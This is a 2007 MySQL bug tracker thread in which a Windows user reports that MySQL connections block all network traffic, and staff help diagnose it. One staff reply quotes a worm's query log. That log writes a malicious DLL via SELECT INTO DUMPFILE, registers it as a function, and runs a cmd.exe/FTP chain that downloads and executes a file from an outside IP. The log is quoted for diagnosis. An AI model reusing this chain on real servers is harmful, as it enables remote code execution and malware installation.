Bug #29694 MySQL Caused TCP/IP Blocked
Submitted: 10 Jul 2007 18:59 Modified: 21 Jul 2007 15:58
Reporter: Hero Lee Email Updates:
Status: Closed Impact on me:
None 
Category:MySQL Server: Locking Severity:S1 (Critical)
Version:5.0.41 OS:Windows (Windows 2003 Server SP2)
Assigned to: CPU Architecture:Any
Tags: block, connect, lock, TCP/IP

[10 Jul 2007 18:59] Hero Lee 
Description:
In few months ago, MySQL work fine on my PC.

At last week, I'm try re-install MySQL, with normal install. install ok, server start ok, but when connect to MySQL, either use MySQL client or GUI tools, will cause ALL TCP/IP connect inactive, ALL Internet Conection was blocked, System hangup, Can't create any new process, but all running process are working, ie:NotePad, the processes use TCP/IP will hangup. If kill MySQLNT-D.exe. the connect resumed. sometime can connect to mysql, but when exe a sql statment this will happen random.

I'm tryed mysql 4.0 & 5.0. I'm shutdown all firewall, antivirus software......

What can i do?

How to repeat:
Connect to mysql will cause all tcp/ip inactive, and process use tcp/ip will hangup. and can't create any new process. no firewall, no antivirus software...
[10 Jul 2007 19:34] MySQL Verification Team 
Thank you for the bug report. Could you please do the below test assuming
you are using MySQL as service:

- Stop the service (be sure looking the Task Manager).
- Open s DOS prompt screen and go to the \bin install directory.
- Start the server as standalone i.e:

  mysqld-nt --defaults-file="C:\Program Files\MySQL\MySQL Server 5.0\my.ini" --standalone --console

and let us know what happens. Thanks in advance.
[11 Jul 2007 12:01] Hero Lee 
C:\pub\Server\MySQL\5041\bin>mysqld-nt --defaults-file="C:\pub\Server\MySQL\5041
\my.ini" --standalone --console
070711 19:46:43  InnoDB: Started; log sequence number 0 43655
070711 19:46:44 [Note] mysqld-nt: ready for connections.
Version: '5.0.41-community-nt'  socket: ''  port: 3306  MySQL Community Edition
(GPL)

other dos box:
C:\pub\Server\MySQL\5041\bin>mysql -uroot
...hang
C:\pub\Server\MySQL\5041\bin>mysql -uroot -p 
password:******
display a mysql banner, hang.
[11 Jul 2007 13:45] MySQL Verification Team 
Thank you for the feedback. Please start the server adding the option
--skip-name-resolve, i.e:

C:\pub\Server\MySQL\5041\bin>mysqld-nt --defaults-file="C:\pub\Server\MySQL\5041\my.ini" --standalone --console --skip-name-resolve

The above should allow you to connect only using IP numbers and to test
if your box have problems with DNS. Quoting the Manual:

"If mysqld is slow to respond to TCP/IP connections from client programs, there is probably a problem with your DNS. In this case, start mysqld with the --skip-name-resolve option and use only localhost and IP numbers in the Host column of the MySQL grant tables."

Thanks in advance.
[11 Jul 2007 16:49] Hero Lee 
C:\pub\Server\MySQL\5041\bin>mysql -uroot -p
Enter password: ****(WITH WRONG PASSWORD)
ERROR 1045 (28000): Access denied for user 'root'@'127.0.0.1' (using password: Y
ES)

C:\pub\Server\MySQL\5041\bin>mysql -uroot -p
Enter password:****(WITH RIGHT PASSWORD)
Welcome to the MySQL monitor.  Commands end with ; or \g.
...system hang... all tcp/ip connect blocked, firefox, icq,  game... all stop response...
...close mysql.exe or mysqlnt-d.exe will resume.
[11 Jul 2007 20:02] Sveta Smirnova 
Thank you for the feedback.

Could you please also check your system for viruses? I met same problem with an virus some time ago.
[19 Jul 2007 16:54] Hero Lee 
Do you remember the Virus Name?

I use Symantec AntiVirus
  Full Version: 10.1.4.4000
  Scan engine: 71.3.0.25
  Definitions File: 2007-07-18 rev. 19

Do a system Full Scan, not report a virus.

and use ZoneAlarm 6.5 (not update to 7.0).

When I start MySQL, I tried shutdown ZoneAlarm, Microsoft Windows Firewall, and Symantec AntiVirus...

The problem is still there. when MySQL-D start(start with Windows Service Management or in a DOS box command), some time can connect to server by use mysql client in dos, use GUI tools will never connect to server(system hang when click "Connect" button). and when execute a SQL statement will hang again randomize.

I'm sure the system will 100% hang at start a new TCP connect when MySQL connected. IE: open a new browser page, new WinCVS check......

Then, System not truly hang, it's seem all TCP connect are blocked(stopped), aDSL modem no any translations, all UDP program(IM, online game)will lost connection(timeout)...

So, it's make me crazy...

And my system is Microsoft Windows 2003 Server Enterprise Edition, Update to SP2. Installed on 2004 summer. and can't Reinstall, it's a nightmare!
[20 Jul 2007 9:06] Tonci Grgin 
Hero, can you locate a file named "clown.dll" in your c:\ and/or c:\windows\system32 folders (and/or soundvol32.exe)? Please also check your mysql general query log for commands like this (this is just an example, in your case they might be a bit different):
--
070715 15:58:22	      5 Query       SELECT * FROM clown INTO DUMPFILE 'c:/windows/system32/clown.dll'
070715 15:58:23	      5 Query       SELECT * FROM clown INTO DUMPFILE 'c:/winnt/system32/clown.dll'
070715 15:58:25	      5 Query       SELECT * FROM clown INTO DUMPFILE 'e:/windows/system32/clown.dll'
070715 15:58:26	      5 Query       SELECT * FROM clown INTO DUMPFILE 'e:/winnt/system32/clown.dll'
		      5 Query       SELECT * FROM clown INTO DUMPFILE 'c:/clown.dll'
070715 15:58:28	      5 Query       SELECT * FROM clown INTO DUMPFILE 'f:/winnt/system32/clown.dll'
070715 15:58:30	      5 Query       SELECT * FROM clown INTO DUMPFILE 'g:/windows/system32/clown.dll'
		      5 Query       SELECT * FROM clown INTO DUMPFILE 'g:/winnt/system32/clown.dll'
070715 15:58:31	      5 Query       SELECT * FROM clown INTO DUMPFILE 'h:/windows/system32/clown.dll'
070715 15:58:32	      5 Query       SELECT * FROM clown INTO DUMPFILE 'h:/winnt/system32/clown.dll'
		      5 Query       CREATE FUNCTION do_system RETURNS integer SONAME 'clown.dll'
070715 15:58:33	      5 Query       SELECT do_system("cmd.exe /c echo open 87.248.189.178 26751 > o&echo user 1 1 >> o &echo get soundvol32.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &soundvol32.exe")
070715 15:58:34	      5 Query       DROP TABLE IF EXISTS clown
--
[20 Jul 2007 10:13] Hero Lee 
Thank you replay.
My System has not any file named CLOWN.DLL or SOUNDVOL32.EXE
but in /WNDOWS/SYSTEM32, there is a file named SNDVOL32.EXE. Google it said is a spy-bot. but seem it's a windows volume control.

    2007-02-17  06:56           154,112 sndvol32.exe

    mysql> select * from user into dumpfile 'c:/windows/system32/clown.dll';
    ERROR 1172 (42000): Result consisted of more than one row

In the morning, I just let's MySQL working.
I had uninstall all MySQL, delete all MySQL fold & registry, then download the newest MySQL 5.0.45 community noinstall-win32 version, unzip it to hard-disk. not do any config. IS WORKING!!!!!! running more than 10 hours so far, and not any problem.

Although I still not understood how else. but it's working, just fine.

Thanks all reply. have a nice day!
[20 Jul 2007 20:43] Tonci Grgin 
Hero, so you do have:
select * from user into dumpfile 'c:/windows/system32/clown.dll';

in your log? If so, you were under attack by this virus and your passwords might be compromised...
[21 Jul 2007 15:58] Hero Lee 
What log? how to see it?
sorry, i'm newbie in MySQL :(
[23 Jul 2007 9:15] Sveta Smirnova 
General Query Log. See also http://dev.mysql.com/doc/refman/5.0/en/query-log.html